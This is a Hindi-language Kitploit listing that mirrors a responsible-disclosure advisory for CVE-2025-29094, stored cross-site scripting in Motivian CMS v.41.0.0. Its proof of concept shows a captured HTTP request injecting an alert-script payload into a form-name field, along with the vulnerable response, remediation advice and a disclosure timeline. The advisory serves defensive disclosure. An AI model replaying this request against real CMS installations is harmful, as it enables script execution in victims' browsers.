Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में पाई गई एक सुरक्षा कमजोरी का खुलासा करती है। | Kitploit
उपकरण/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में पाई गई एक सुरक्षा कमजोरी का खुलासा करती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-29094-एकाधिक-संग्रहीत-क्रॉस-साइट-स्क्रिप्टिंग-XSS

यह रिपॉजिटरी Motivian Content Management System v.41.0.0 में खोजी गई एक सुरक्षा कमजोरी को प्रकट करता है।

  • CVE-2025-29094: एकाधिक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)

यह कमजोरी जिम्मेदार प्रकटीकरण प्रथाओं के अनुसार विक्रेता को, और MITRE को सूचित की गई, जिसने एक अस्थायी CVE ID निर्दिष्ट की। विवरण 45-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद सार्वजनिक किए जा रहे हैं।

सामान्य जानकारी

  • शीर्षक: Motivian Stored Cross Site Scripting (XSS)
  • कमजोरी का प्रकार: Stored XSS
  • उत्पाद का विक्रेता: Motivian
  • उत्पाद: Motivian Content Management System
  • प्रभावित संस्करण: Motivian CMS v.41.0.0
  • प्रभावित घटक: Marketing/Forms, Marketing/Offers, Content/Pages
  • हमला वेक्टर: Remote
  • प्रभाव: पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादन
  • गंभीरता: उच्च
  • CVSSv3 स्कोर: 7.6
  • CVSSv3 वेक्टर: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • CISA-ADP द्वारा गंभीरता: मध्यम
  • CISA-ADP द्वारा CVSSv3 स्कोर: 6.1
  • CISA-ADP द्वारा CVSSv3 वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • पाया गया: 2025-01-29
  • द्वारा: Francesco Marcuccio
  • स्थिति: 7 अप्रैल 2025 को विक्रेता को सूचित किया गया - 22 मई 2025 तक कोई प्रतिक्रिया/सुधार प्राप्त नहीं हुआ

विवरण

Motivian Content Mangment System v.41.0.0 में क्रॉस-साइट स्क्रिप्टिंग कमजोरी एक दूरस्थ हमलावर को Marketing/Forms, Marketing/Offers और Content/Pages घटकों के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। इस कमजोरी का शोषण विभिन्न फ़ील्ड्स में दुर्भावनापूर्ण JavaScript कोड इंजेक्ट करके किया गया, जिसमें Marketing/Form और Marketing/Offers में शीर्षक, और Content/Pages में header script फ़ील्ड शामिल हैं।

प्रमाण की अवधारणा

इस कमजोरी का शोषण विभिन्न घटकों में विभिन्न फ़ील्ड्स के माध्यम से किया जा सकता है। प्रदर्शन उद्देश्यों के लिए, निम्नलिखित प्रूफ-ऑफ-कॉन्सेप्ट एक विशिष्ट परिदृश्य पर केंद्रित है:

  1. Marketing/Forms अनुभाग पर जाएं और एक नया फॉर्म तत्व बनाएं।
  2. Name फ़ील्ड में एक दुर्भावनापूर्ण स्क्रिप्ट डालें और फॉर्म को सहेजें।

समस्या को प्रदर्शित करने के लिए उपयोग किए गए HTTP अनुरोधों और प्रतिक्रियाओं का पूर्ण प्रतिलेख नीचे दिया गया है:

Burp Request

root@kitploit:~
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]

Burp Response

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]

उपचार

सभी उपयोगकर्ता इनपुट को स्वच्छ करें और रेंडर करने से पहले आउटपुट को एस्केप करें। XSS जोखिमों को कम करने के लिए CSP (Content Security Policy) हेडर लागू करें।

प्रकटीकरण समयरेखा

DateAction
2025-02-06CVE ID अनुरोध (CNA: MITRE)
2025-04-02

क्रेडिट

  • द्वारा खोजा गया और जिम्मेदारी से प्रकट किया गया:
    Francesco Marcuccio
    साइबरसुरक्षा सलाहकार, पेनिट्रेशन टेस्टर

  • MITRE खोजकर्ता श्रेय इस प्रकार सूचीबद्ध:
    Francesco Marcuccio
    साइबरसुरक्षा सलाहकार, पेनिट्रेशन टेस्टर

लिंक्स

संदर्भ लिंक: MITRE NIST

स्थिति

यह CVE ID आधिकारिक तौर पर PUBLISHED स्थिति में है। विश्लेषण के बाद NIST द्वारा CVSS स्कोर के साथ अपडेट किया जाएगा।

टूल डाउनलोड करें
CVE ID असाइनमेंट
2025-04-07विक्रेता को कमजोरियों की सूचना
2025-05-3145-दिवसीय प्रकटीकरण अवधि समाप्त होने के बाद सार्वजनिक प्रकटीकरण (कुल 54 दिन)
2025-06-04MITRE डेटाबेस और NIST/NVD पोर्टल में आधिकारिक पंजीकरण और प्रविष्टि